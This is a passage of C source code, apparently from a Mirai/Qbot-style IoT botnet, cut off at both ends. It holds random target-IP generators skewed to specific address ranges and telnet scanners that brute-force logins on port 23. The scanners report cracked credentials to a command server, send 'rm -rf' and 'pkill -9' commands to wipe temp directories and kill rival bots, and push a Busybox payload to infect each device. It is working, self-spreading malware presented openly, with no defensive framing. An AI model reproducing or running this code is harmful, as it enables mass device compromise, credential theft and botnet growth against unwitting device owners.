937. ipState[0] = rand() % 255;
938. ipState[1] = rand() % 255;
939. ipState[2] = rand() % 255;
940. ipState[3] = rand() % 255;
941. int randnum = rand() % 117;
942. char ip[16];
943. if(randnum == 0)
944. {
945. szprintf(ip, "119.157.%d.%d", ipState[2], ipState[3]);
946. }
947. if(randnum == 1)
948. {
949. szprintf(ip, "119.150.%d.%d", ipState[2], ipState[3]);
950. }
951. if(randnum == 2)
952. {
953. szprintf(ip, "119.151.%d.%d", ipState[2], ipState[3]);
954. }
955. if(randnum == 3)
956. {
957. szprintf(ip, "119.152.%d.%d", ipState[2], ipState[3]);
958. }
959. if(randnum == 4)
960. {
961. szprintf(ip, "119.153.%d.%d", ipState[2], ipState[3]);
962. }
963. if(randnum == 5)
964. {
965. szprintf(ip, "119.154.%d.%d", ipState[2], ipState[3]);
966. }
967. if(randnum == 6)
968. {
969. szprintf(ip, "119.155.%d.%d", ipState[2], ipState[3]);
970. }
971. if(randnum == 7)
972. {
973. szprintf(ip, "119.156.%d.%d", ipState[2], ipState[3]);
974. }
975. if(randnum == 8)
976. {
977. szprintf(ip, "119.157.%d.%d", ipState[2], ipState[3]);
978. }
979. if(randnum == 9)
980. {
981. szprintf(ip, "119.158.%d.%d", ipState[2], ipState[3]);
982. }
983. if(randnum == 10)
984. {
985. szprintf(ip, "119.159.%d.%d", ipState[2], ipState[3]);
986. }
987. if(randnum == 11)
988. {
989. szprintf(ip, "191.24.%d.%d", ipState[2], ipState[3]);
990. }
991. if(randnum == 12)
992. {
993. szprintf(ip, "187.119.%d.%d", ipState[2], ipState[3]);
994. }
995. if(randnum == 13)
996. {
997. szprintf(ip, "177.215.%d.%d", ipState[2], ipState[3]);
998. }
999. if(randnum == 14)
1000. {
1001. szprintf(ip, "152.241.%d.%d", ipState[2], ipState[3]);
1002. }
1003. if(randnum == 15)
1004. {
1005. szprintf(ip, "182.185.%d.%d", ipState[2], ipState[3]);
1006. }
1007. if(randnum == 16)
1008. {
1009. szprintf(ip, "179.80.%d.%d", ipState[2], ipState[3]);
1010. }
1011. if(randnum == 17)
1012. {
1013. szprintf(ip, "179.81.%d.%d", ipState[2], ipState[3]);
1014. }
1015. if(randnum == 18)
1016. {
1017. szprintf(ip, "179.82.%d.%d", ipState[2], ipState[3]);
1018. }
1019. if(randnum == 19)
1020. {
1021. szprintf(ip, "179.83.%d.%d", ipState[2], ipState[3]);
1022. }
1023. if(randnum == 20)
1024. {
1025. szprintf(ip, "179.84.%d.%d", ipState[2], ipState[3]);
1026. }
1027. if(randnum == 21)
1028. {
1029. szprintf(ip, "179.86.%d.%d", ipState[2], ipState[3]);
1030. }
1031. if(randnum == 22)
1032. {
1033. szprintf(ip, "179.87.%d.%d", ipState[2], ipState[3]);
1034. }
1035. if(randnum == 23)
1036. {
1037. szprintf(ip, "179.88.%d.%d", ipState[2], ipState[3]);
1038. }
1039. if(randnum == 24)
1040. {
1041. szprintf(ip, "179.89.%d.%d", ipState[2], ipState[3]);
1042. }
1043. if(randnum == 25)
1044. {
1045. szprintf(ip, "179.90.%d.%d", ipState[2], ipState[3]);
1046. }
1047. if(randnum == 26)
1048. {
1049. szprintf(ip, "179.91.%d.%d", ipState[2], ipState[3]);
1050. }
1051. if(randnum == 27)
1052. {
1053. szprintf(ip, "179.92.%d.%d", ipState[2], ipState[3]);
1054. }
1055. if(randnum == 28)
1056. {
1057. szprintf(ip, "179.93.%d.%d", ipState[2], ipState[3]);
1058. }
1059. if(randnum == 29)
1060. {
1061. szprintf(ip, "179.94.%d.%d", ipState[2], ipState[3]);
1062. }
1063. if(randnum == 30)
1064. {
1065. szprintf(ip, "179.95.%d.%d", ipState[2], ipState[3]);
1066. }
1067. if(randnum == 31)
1068. {
1069. szprintf(ip, "179.96.%d.%d", ipState[2], ipState[3]);
1070. }
1071. if(randnum == 32)
1072. {
1073. szprintf(ip, "179.97.%d.%d", ipState[2], ipState[3]);
1074. }
1075. if(randnum == 33)
1076. {
1077. szprintf(ip, "179.98.%d.%d", ipState[2], ipState[3]);
1078. }
1079. if(randnum == 34)
1080. {
1081. szprintf(ip, "179.99.%d.%d", ipState[2], ipState[3]);
1082. }
1083. if(randnum == 35)
1084. {
1085. szprintf(ip, "152.240.%d.%d", ipState[2], ipState[3]);
1086. }
1087. if(randnum == 36)
1088. {
1089. szprintf(ip, "152.241.%d.%d", ipState[2], ipState[3]);
1090. }
1091. if(randnum == 37)
1092. {
1093. szprintf(ip, "152.242.%d.%d", ipState[2], ipState[3]);
1094. }
1095. if(randnum == 38)
1096. {
1097. szprintf(ip, "152.243.%d.%d", ipState[2], ipState[3]);
1098. }
1099. if(randnum == 39)
1100. {
1101. szprintf(ip, "152.244.%d.%d", ipState[2], ipState[3]);
1102. }
1103. if(randnum == 40)
1104. {
1105. szprintf(ip, "152.245.%d.%d", ipState[2], ipState[3]);
1106. }
1107. if(randnum == 41)
1108. {
1109. szprintf(ip, "152.246.%d.%d", ipState[2], ipState[3]);
1110. }
1111. if(randnum == 42)
1112. {
1113. szprintf(ip, "152.247.%d.%d", ipState[2], ipState[3]);
1114. }
1115. if(randnum == 43)
1116. {
1117. szprintf(ip, "152.248.%d.%d", ipState[2], ipState[3]);
1118. }
1119. if(randnum == 44)
1120. {
1121. szprintf(ip, "152.249.%d.%d", ipState[2], ipState[3]);
1122. }
1123. if(randnum == 45)
1124. {
1125. szprintf(ip, "182.189.%d.%d", ipState[2], ipState[3]);
1126. }
1127. if(randnum == 46)
1128. {
1129. szprintf(ip, "182.190.%d.%d", ipState[2], ipState[3]);
1130. }
1131. if(randnum == 47)
1132. {
1133. szprintf(ip, "182.191.%d.%d", ipState[2], ipState[3]);
1134. }
1135. if(randnum == 48)
1136. {
1137. szprintf(ip, "182.188.%d.%d", ipState[2], ipState[3]);
1138. }
1139. if(randnum == 49)
1140. {
1141. szprintf(ip, "182.187.%d.%d", ipState[2], ipState[3]);
1142. }
1143. if(randnum == 50)
1144. {
1145. szprintf(ip, "182.186.%d.%d", ipState[2], ipState[3]);
1146. }
1147. if(randnum == 51)
1148. {
1149. szprintf(ip, "182.185.%d.%d", ipState[2], ipState[3]);
1150. }
1151. if(randnum == 52)
1152. {
1153. szprintf(ip, "182.184.%d.%d", ipState[2], ipState[3]);
1154. }
1155. if(randnum == 53)
1156. {
1157. szprintf(ip, "179.100.%d.%d", ipState[2], ipState[3]);
1158. }
1159. if(randnum == 54)
1160. {
1161. szprintf(ip, "179.101.%d.%d", ipState[2], ipState[3]);
1162. }
1163. if(randnum == 55)
1164. {
1165. szprintf(ip, "179.102.%d.%d", ipState[2], ipState[3]);
1166. }
1167. if(randnum == 56)
1168. {
1169. szprintf(ip, "179.103.%d.%d", ipState[2], ipState[3]);
1170. }
1171. if(randnum == 57)
1172. {
1173. szprintf(ip, "179.110.%d.%d", ipState[2], ipState[3]);
1174. }
1175. if(randnum == 58)
1176. {
1177. szprintf(ip, "179.111.%d.%d", ipState[2], ipState[3]);
1178. }
1179. if(randnum == 59)
1180. {
1181. szprintf(ip, "179.112.%d.%d", ipState[2], ipState[3]);
1182. }
1183. if(randnum == 60)
1184. {
1185. szprintf(ip, "179.113.%d.%d", ipState[2], ipState[3]);
1186. }
1187. if(randnum == 61)
1188. {
1189. szprintf(ip, "179.114.%d.%d", ipState[2], ipState[3]);
1190. }
1191. if(randnum == 62)
1192. {
1193. szprintf(ip, "179.115.%d.%d", ipState[2], ipState[3]);
1194. }
1195. if(randnum == 63)
1196. {
1197. szprintf(ip, "179.116.%d.%d", ipState[2], ipState[3]);
1198. }
1199. if(randnum == 64)
1200. {
1201. szprintf(ip, "179.117.%d.%d", ipState[2], ipState[3]);
1202. }
1203. if(randnum == 65)
1204. {
1205. szprintf(ip, "191.193.%d.%d", ipState[2], ipState[3]);
1206. }
1207. if(randnum == 66)
1208. {
1209. szprintf(ip, "191.194.%d.%d", ipState[2], ipState[3]);
1210. }
1211. if(randnum == 67)
1212. {
1213. szprintf(ip, "191.195.%d.%d", ipState[2], ipState[3]);
1214. }
1215. if(randnum == 68)
1216. {
1217. szprintf(ip, "191.196.%d.%d", ipState[2], ipState[3]);
1218. }
1219. if(randnum == 69)
1220. {
1221. szprintf(ip, "191.197.%d.%d", ipState[2], ipState[3]);
1222. }
1223. if(randnum == 70)
1224. {
1225. szprintf(ip, "191.198.%d.%d", ipState[2], ipState[3]);
1226. }
1227. if(randnum == 71)
1228. {
1229. szprintf(ip, "152.250.%d.%d", ipState[2], ipState[3]);
1230. }
1231. if(randnum == 72)
1232. {
1233. szprintf(ip, "152.251.%d.%d", ipState[2], ipState[3]);
1234. }
1235. if(randnum == 73)
1236. {
1237. szprintf(ip, "152.252.%d.%d", ipState[2], ipState[3]);
1238. }
1239. if(randnum == 74)
1240. {
1241. szprintf(ip, "152.253.%d.%d", ipState[2], ipState[3]);
1242. }
1243. if(randnum == 75)
1244. {
1245. szprintf(ip, "152.254.%d.%d", ipState[2], ipState[3]);
1246. }
1247. if(randnum == 76)
1248. {
1249. szprintf(ip, "152.255.%d.%d", ipState[2], ipState[3]);
1250. }
1251. if(randnum == 77)
1252. {
1253. szprintf(ip, "177.112.%d.%d", ipState[2], ipState[3]);
1254. }
1255. if(randnum == 78)
1256. {
1257. szprintf(ip, "177.113.%d.%d", ipState[2], ipState[3]);
1258. }
1259. if(randnum == 79)
1260. {
1261. szprintf(ip, "177.114.%d.%d", ipState[2], ipState[3]);
1262. }
1263. if(randnum == 80)
1264. {
1265. szprintf(ip, "177.115.%d.%d", ipState[2], ipState[3]);
1266. }
1267. if(randnum == 81)
1268. {
1269. szprintf(ip, "177.116.%d.%d", ipState[2], ipState[3]);
1270. }
1271. if(randnum == 82)
1272. {
1273. szprintf(ip, "177.117.%d.%d", ipState[2], ipState[3]);
1274. }
1275. if(randnum == 83)
1276. {
1277. szprintf(ip, "177.118.%d.%d", ipState[2], ipState[3]);
1278. }
1279. if(randnum == 84)
1280. {
1281. szprintf(ip, "177.119.%d.%d", ipState[2], ipState[3]);
1282. }
1283. if(randnum == 85)
1284. {
1285. szprintf(ip, "177.120.%d.%d", ipState[2], ipState[3]);
1286. }
1287. if(randnum == 86)
1288. {
1289. szprintf(ip, "177.121.%d.%d", ipState[2], ipState[3]);
1290. }
1291. if(randnum == 87)
1292. {
1293. szprintf(ip, "177.138.%d.%d", ipState[2], ipState[3]);
1294. }
1295. if(randnum == 88)
1296. {
1297. szprintf(ip, "177.139.%d.%d", ipState[2], ipState[3]);
1298. }
1299. if(randnum == 89)
1300. {
1301. szprintf(ip, "177.144.%d.%d", ipState[2], ipState[3]);
1302. }
1303. if(randnum == 90)
1304. {
1305. szprintf(ip, "177.145.%d.%d", ipState[2], ipState[3]);
1306. }
1307. if(randnum == 91)
1308. {
1309. szprintf(ip, "177.146.%d.%d", ipState[2], ipState[3]);
1310. }
1311. if(randnum == 92)
1312. {
1313. szprintf(ip, "177.147.%d.%d", ipState[2], ipState[3]);
1314. }
1315. if(randnum == 93)
1316. {
1317. szprintf(ip, "177.160.%d.%d", ipState[2], ipState[3]);
1318. }
1319. if(randnum == 94)
1320. {
1321. szprintf(ip, "177.161.%d.%d", ipState[2], ipState[3]);
1322. }
1323. if(randnum == 95)
1324. {
1325. szprintf(ip, "177.162.%d.%d", ipState[2], ipState[3]);
1326. }
1327. if(randnum == 96)
1328. {
1329. szprintf(ip, "177.163.%d.%d", ipState[2], ipState[3]);
1330. }
1331. if(randnum == 97)
1332. {
1333. szprintf(ip, "177.168.%d.%d", ipState[2], ipState[3]);
1334. }
1335. if(randnum == 98)
1336. {
1337. szprintf(ip, "177.169.%d.%d", ipState[2], ipState[3]);
1338. }
1339. if(randnum == 99)
1340. {
1341. szprintf(ip, "177.170.%d.%d", ipState[2], ipState[3]);
1342. }
1343. if(randnum == 100)
1344. {
1345. szprintf(ip, "177.171.%d.%d", ipState[2], ipState[3]);
1346. }
1347. if(randnum == 101)
1348. {
1349. szprintf(ip, "177.172.%d.%d", ipState[2], ipState[3]);
1350. }
1351. if(randnum == 102)
1352. {
1353. szprintf(ip, "189.96.%d.%d", ipState[2], ipState[3]);
1354. }
1355. if(randnum == 103)
1356. {
1357. szprintf(ip, "189.97.%d.%d", ipState[2], ipState[3]);
1358. }
1359. if(randnum == 104)
1360. {
1361. szprintf(ip, "189.98.%d.%d", ipState[2], ipState[3]);
1362. }
1363. if(randnum == 105)
1364. {
1365. szprintf(ip, "189.99.%d.%d", ipState[2], ipState[3]);
1366. }
1367. if(randnum == 106)
1368. {
1369. szprintf(ip, "39.34.%d.%d", ipState[2], ipState[3]);
1370. }
1371. if(randnum == 107)
1372. {
1373. szprintf(ip, "59.103.%d.%d", ipState[2], ipState[3]);
1374. }
1375. if(randnum == 108)
1376. {
1377. szprintf(ip, "191.12.%d.%d", ipState[2], ipState[3]);
1378. }
1379. if(randnum == 109)
1380. {
1381. szprintf(ip, "186.117.%d.%d", ipState[2], ipState[3]);
1382. }
1383. if(randnum == 110)
1384. {
1385. szprintf(ip, "179.131.%d.%d", ipState[2], ipState[3]);
1386. }
1387. if(randnum == 111)
1388. {
1389. szprintf(ip, "179.129.%d.%d", ipState[2], ipState[3]);
1390. }
1391. if(randnum == 112)
1392. {
1393. szprintf(ip, "179.170.%d.%d", ipState[2], ipState[3]);
1394. }
1395. if(randnum == 113)
1396. {
1397. szprintf(ip, "191.206.%d.%d", ipState[2], ipState[3]);
1398. }
1399. if(randnum == 114)
1400. {
1401. szprintf(ip, "187.118.%d.%d", ipState[2], ipState[3]);
1402. }
1403. if(randnum == 115)
1404. {
1405. szprintf(ip, "187.116.%d.%d", ipState[2], ipState[3]);
1406. }
1407. if(randnum == 116)
1408. {
1409. szprintf(ip, "179.224.%d.%d", ipState[2], ipState[3]);
1410. }
1411. if(randnum == 117)
1412. {
1413. szprintf(ip, "179.166.%d.%d", ipState[2], ipState[3]);
1414. }
1415. return inet_addr(ip);
1416. }
1417. static ipv4_t MiraiIPRanges(void)
1418. {
1419. uint32_t tmp;
1420. uint8_t o1, o2, o3, o4;
1421. do
1422. {
1423. tmp = rand_cmwc();
1424. o1 = tmp & 0xff;
1425. o2 = (tmp >> 8) & 0xff;
1426. o3 = (tmp >> 16) & 0xff;
1427. o4 = (tmp >> 24) & 0xff;
1428. }
1429. while (o1 == 127 || // 127.0.0.0/8 - Loopback
1430. (o1 == 0) || // 0.0.0.0/8 - Invalid address space
1431. (o1 == 3) || // 3.0.0.0/8 - General Electric Company
1432. (o1 == 15 || o1 == 16) || // 15.0.0.0/7 - Hewlett-Packard Company
1433. (o1 == 56) || // 56.0.0.0/8 - US Postal Service
1434. (o1 == 10) || // 10.0.0.0/8 - Internal network
1435. (o1 == 192 && o2 == 168) || // 192.168.0.0/16 - Internal network
1436. (o1 == 172 && o2 >= 16 && o2 < 32) || // 172.16.0.0/14 - Internal network
1437. (o1 == 100 && o2 >= 64 && o2 < 127) || // 100.64.0.0/10 - IANA NAT reserved
1438. (o1 == 169 && o2 > 254) || // 169.254.0.0/16 - IANA NAT reserved
1439. (o1 == 198 && o2 >= 18 && o2 < 20) || // 198.18.0.0/15 - IANA Special use
1440. (o1 >= 224) || // 224.*.*.*+ - Multicast
1441. (o1 == 6 || o1 == 7 || o1 == 11 || o1 == 21 || o1 == 22 || o1 == 26 || o1 == 28 || o1 == 29 || o1 == 30 || o1 == 33 || o1 == 55 || o1 == 214 || o1 == 215) // Department of Defense
1442. );
1443. char ip[16];
1444. szprintf(ip, "%d.%d.%d.%d", o1, o2, o3, o4);
1445. return INET_ADDR(o1,o2,o3,o4);
1446. }
1447. int rangechoice = 1;
1448. in_addr_t findARandomIP()
1449. {
1450. if(rangechoice < 1 || rangechoice > 2)
1451. {
1452. return getRandomPublicIP();
1453. }
1454. else
1455. {
1456. if(rangechoice == 1){
1457. return getRandomPublicIP();
1458. }
1459. else if(rangechoice == 2)
1460. {
1461. return getRandomPublicIP();
1462. }
1463. else
1464. {
1465. return getRandomPublicIP();
1466. }
1467. }
1468. }
1469. in_addr_t getRandomIP(in_addr_t netmask) {
1470. in_addr_t tmp = ntohl(ourIP.s_addr) & netmask;
1471. return tmp ^ ( rand_cmwc() & ~netmask);
1472. }
1473. unsigned short csum (unsigned short *buf, int count) {
1474. register uint64_t sum = 0;
1475. while( count > 1 ) { sum += *buf++; count -= 2; }
1476. if(count > 0) { sum += *(unsigned char *)buf; }
1477. while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
1478. return (uint16_t)(~sum);
1479. }
1480. unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
1481. struct tcp_pseudo {
1482. unsigned long src_addr;
1483. unsigned long dst_addr;
1484. unsigned char zero;
1485. unsigned char proto;
1486. unsigned short length;
1487. } pseudohead;
1488. unsigned short total_len = iph->tot_len;
1489. pseudohead.src_addr=iph->saddr;
1490. pseudohead.dst_addr=iph->daddr;
1491. pseudohead.zero=0;
1492. pseudohead.proto=IPPROTO_TCP;
1493. pseudohead.length=htons(sizeof(struct tcphdr));
1494. int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
1495. unsigned short *tcp = malloc(totaltcp_len);
1496. memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
1497. memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
1498. unsigned short output = csum(tcp,totaltcp_len);
1499. free(tcp);
1500. return output;
1501. }
1502. void makeIPPacket(struct iphdr *iph, uint32_t dest, uint32_t source, uint8_t protocol, int packetSize) {
1503. iph->ihl = 5;
1504. iph->version = 4;
1505. iph->tos = 0;
1506. iph->tot_len = sizeof(struct iphdr) + packetSize;
1507. iph->id = rand_cmwc();
1508. iph->frag_off = 0;
1509. iph->ttl = MAXTTL;
1510. iph->protocol = protocol;
1511. iph->check = 0;
1512. iph->saddr = source;
1513. iph->daddr = dest;
1514. }
1515. int sclose(int fd) {
1516. if(3 > fd) return 1;
1517. close(fd);
1518. return 0;
1519. }
1520. void BCMscanner() {
1521. int maxfds = 312, i, res, j, valopt;
1522. int max = maxfds;
1523. char buf[128], cur_dir;
1524. fd_set fdset;
1525. struct timeval tv;
1526. socklen_t lon;
1527. srand(time(NULL) ^ rand_cmwc());
1528. char line[256];
1529. char* buffer;
1530. struct sockaddr_in dest_addr;
1531. dest_addr.sin_family = AF_INET;
1532. dest_addr.sin_port = htons(23);
1533. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
1534. buffer = malloc(312 + 1);
1535. memset(buffer, 0, 312 + 1);
1536. struct telstate_t fds[max];
1537. memset(fds, 0, max * (sizeof(int) + 1));
1538. for(i = 0; i < max; i++) {
1539. memset(&(fds[i]), 0, sizeof(struct telstate_t));
1540. fds[i].complete = 1;
1541. fds[i].sockbuf = buffer; }
1542. while(1) {
1543. for(i = 0; i < max; i++) {
1544. if(fds[i].tTimeout == 0) {
1545. fds[i].tTimeout = time(NULL); }
1546. switch(fds[i].state) {
1547. case 0: {
1548. if(fds[i].complete == 1) {
1549. char *tmp = fds[i].sockbuf;
1550. memset(&(fds[i]), 0, sizeof(struct telstate_t));
1551. fds[i].sockbuf = tmp;
1552. fds[i].ip = BCMSCAN(); }
1553. dest_addr.sin_family = AF_INET;
1554. dest_addr.sin_port = htons(23);
1555. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
1556. dest_addr.sin_addr.s_addr = fds[i].ip;
1557. fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
1558. if(fds[i].fd == -1) continue;
1559. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
1560. if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS) {
1561. sclose(fds[i].fd);
1562. fds[i].complete = 1; }
1563. else {
1564. fds[i].state = 1;
1565. fds[i].tTimeout = 0;
1566. }
1567. }
1568. break;
1569. case 1: {
1570. FD_ZERO(&fdset);
1571. FD_SET(fds[i].fd, &fdset);
1572. tv.tv_sec = 0;
1573. tv.tv_usec = 10000;
1574. res = select(fds[i].fd+1, NULL, &fdset, NULL, &tv);
1575. if(res == 1) {
1576. lon = sizeof(int);
1577. valopt = 0;
1578. getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
1579. if(valopt) {
1580. sclose(fds[i].fd);
1581. fds[i].state = 0;
1582. fds[i].complete = 1;
1583. } else {
1584. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
1585. fds[i].tTimeout = 0;
1586. fds[i].bufUsed = 0;
1587. memset(fds[i].sockbuf, 0, 312);
1588. fds[i].state = 2;
1589. } continue; }
1590. else if(res == -1) {
1591. sclose(fds[i].fd);
1592. fds[i].state = 0;
1593. fds[i].complete = 1;
1594. continue; }
1595. if(fds[i].tTimeout + 6 < time(NULL)) {
1596. sclose(fds[i].fd);
1597. fds[i].state = 0;
1598. fds[i].complete = 1;
1599. }
1600. }
1601. break;
1602. case 2: {
1603. if(read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 312, phone)) {
1604. if(contains_fail(fds[i].sockbuf)) {
1605. fds[i].state = 0;
1606. } else {
1607. fds[i].state = 3; }
1608. continue; }
1609. if(fds[i].tTimeout + 6 < time(NULL)) {
1610. fds[i].state = 0;
1611. fds[i].complete = 1;
1612. }
1613. }
1614. break;
1615. case 3: {
1616. if(send(fds[i].fd, "admin\r\n", 7, MSG_NOSIGNAL) < 0) {
1617. fds[i].state = 0;
1618. fds[i].complete = 1;
1619. continue; }
1620. fds[i].state = 4;
1621. }
1622. break;
1623. case 4: {
1624. if(read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 312, phone)) {
1625. if(contains_fail(fds[i].sockbuf)) {
1626. fds[i].state = 0;
1627. } else {
1628. fds[i].state = 5; }
1629. continue; }
1630. if(fds[i].tTimeout + 6 < time(NULL)) {
1631. fds[i].state = 0;
1632. fds[i].complete = 1;
1633. }
1634. }
1635. break;
1636. case 5: {
1637. if(send(fds[i].fd, "admin\r\n", 7, MSG_NOSIGNAL) < 0) {
1638. fds[i].state = 0;
1639. fds[i].complete = 1;
1640. continue; }
1641. fds[i].state = 6; }
1642. break;
1643. case 6: {
1644. if (read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 312, advances2)) {
1645. fds[i].tTimeout = time(NULL);
1646. if (contains_fail(fds[i].sockbuf)) {
1647. fds[i].state = 0;
1648. } else {
1649. sockprintf(mainCommSock, "[ BCM ] Successfully Bruted. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
1650. sockprintf(mainCommSock, "REPORT %s:%s:%s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
1651. fds[i].state = 7;
1652. } continue; }
1653. if (fds[i].tTimeout + 7 < time(NULL)) {
1654. fds[i].state = 0;
1655. fds[i].complete = 1;
1656. }
1657. }
1658. break;
1659. case 7: {
1660. char RemoveTheTempDirs [80];
1661. sprintf(RemoveTheTempDirs, "rm -rf %s;", Temp_Directorys);
1662. if(send(fds[i].fd, RemoveTheTempDirs, strlen(RemoveTheTempDirs), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
1663. RemoveTempDirs();
1664. sockprintf(mainCommSock, "[ BCM ] Removing Temp Directorys. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
1665. char killtheproccesses[80];
1666. sprintf(killtheproccesses, "pkill -9 %s;killall -9 %s;", Bot_Killer_Binarys, Bot_Killer_Binarys);
1667. if(send(fds[i].fd, killtheproccesses, strlen(killtheproccesses), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
1668. sockprintf(mainCommSock, "[ BCM ] Bot Killing. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
1669.  
1670. fds[i].tTimeout = time(NULL);
1671. if(send(fds[i].fd, Busybox_Payload, strlen(Busybox_Payload), MSG_NOSIGNAL) < 0) {
1672. sclose(fds[i].fd);
1673. fds[i].state = 0;
1674. fds[i].complete = 1;
1675. continue; }
1676. fds[i].complete = 3;
1677. if(fds[i].tTimeout + 60 < time(NULL)) {
1678. if(fds[i].complete !=3){
1679. }
1680. fds[i].state = 0;
1681. fds[i].complete = 1;
1682. }
1683. break;
1684. }
1685. }
1686. }
1687. }
1688. }
1689. void TelnetScanner(int wait_usec, int maxfds){
1690. int max = getdtablesize() - 100, i, res, num_tmps, j;
1691. char buf[128], cur_dir;
1692. if (max > maxfds)
1693. max = maxfds;
1694. fd_set fdset;
1695. struct timeval tv;
1696. socklen_t lon;
1697. int valopt;
1698. char line[256];
1699. char* buffer;
1700. struct sockaddr_in dest_addr;
1701. dest_addr.sin_family = AF_INET;
1702. dest_addr.sin_port = htons(23);
1703. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
1704. buffer = malloc(SOCKBUF_SIZE + 1);
1705. memset(buffer, 0, SOCKBUF_SIZE + 1);
1706. struct telstate_t fds[max];
1707. memset(fds, 0, max * (sizeof(int) + 1));
1708. for(i = 0; i < max; i++)
1709. {
1710. memset(&(fds[i]), 0, sizeof(struct telstate_t));
1711. fds[i].complete = 1;
1712. fds[i].sockbuf = buffer;
1713. }
1714. while(1) {
1715. for(i = 0; i < max; i++) {
1716. if(fds[i].tTimeout == 0) {
1717. fds[i].tTimeout = time(NULL);
1718. }
1719. switch(fds[i].state) {
1720. case 0:
1721. {
1722. if(fds[i].complete == 1)
1723. {
1724. char *tmp = fds[i].sockbuf;
1725. memset(&(fds[i]), 0, sizeof(struct telstate_t));
1726. fds[i].sockbuf = tmp;
1727. fds[i].ip = findARandomIP();
1728. }
1729. else if(fds[i].complete == 0)
1730. {
1731. fds[i].usernameInd++;
1732. fds[i].passwordInd++;
1733. if(fds[i].passwordInd == sizeof(Telnet_Passwords) / sizeof(char *))
1734. {
1735. fds[i].complete = 1;
1736. continue;
1737. }
1738. if(fds[i].usernameInd == sizeof(Telnet_Usernames) / sizeof(char *))
1739. {
1740. fds[i].complete = 1;
1741. continue;
1742. }
1743. }
1744. dest_addr.sin_family = AF_INET;
1745. dest_addr.sin_port = htons(23);
1746. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
1747. dest_addr.sin_addr.s_addr = fds[i].ip;
1748. fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
1749. if(fds[i].fd == -1) continue;
1750. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
1751. if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS)
1752. {
1753. reset_telstate(&fds[i]);
1754. }
1755. else
1756. {
1757. advance_telstate(&fds[i], 1);
1758. }
1759. }
1760. break;
1761. case 1:
1762. {
1763. FD_ZERO(&fdset);
1764. FD_SET(fds[i].fd, &fdset);
1765. tv.tv_sec = 0;
1766. tv.tv_usec = wait_usec;
1767. res = select(fds[i].fd+1, NULL, &fdset, NULL, &tv);
1768. if(res == 1) {
1769. fds[i].tTimeout = 0;
1770. lon = sizeof(int);
1771. valopt = 0;
1772. getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
1773. if(valopt)
1774. {
1775. reset_telstate(&fds[i]);
1776. }
1777. else
1778. {
1779. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
1780. advance_telstate(&fds[i], 2);
1781. }
1782. continue;
1783. }
1784. else if(res == -1)
1785. {
1786. reset_telstate(&fds[i]);
1787. continue;
1788. }
1789. if(fds[i].tTimeout + 7 < time(NULL))
1790. {
1791. reset_telstate(&fds[i]);
1792. }
1793. }
1794. break;
1795. case 2:
1796. {
1797. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances))
1798. {
1799. fds[i].tTimeout = time(NULL);
1800. if(contains_fail(fds[i].sockbuf))
1801. {
1802. advance_telstate(&fds[i], 0);
1803. }
1804. else
1805. {
1806. advance_telstate(&fds[i], 3);
1807. }
1808. continue;
1809. }
1810. if(fds[i].tTimeout + 7 < time(NULL))
1811. {
1812. reset_telstate(&fds[i]);
1813. }
1814. }
1815. break;
1816. case 3:
1817. {
1818. if(send(fds[i].fd, Telnet_Usernames[fds[i].usernameInd], strlen(Telnet_Usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0)
1819. {
1820. reset_telstate(&fds[i]);
1821. continue;
1822. }
1823. if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)
1824. {
1825. reset_telstate(&fds[i]);
1826. continue;
1827. }
1828. advance_telstate(&fds[i], 4);
1829. }
1830. break;
1831. case 4:
1832. {
1833. if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances))
1834. {
1835. fds[i].tTimeout = time(NULL);
1836. if(contains_fail(fds[i].sockbuf))
1837. {
1838. advance_telstate(&fds[i], 0);
1839. }
1840. else
1841. {
1842. advance_telstate(&fds[i], 5);
1843. }
1844. continue;
1845. }
1846. if(fds[i].tTimeout + 7 < time(NULL))
1847. {
1848. reset_telstate(&fds[i]);
1849. }
1850. }
1851. break;
1852. case 5:
1853. {
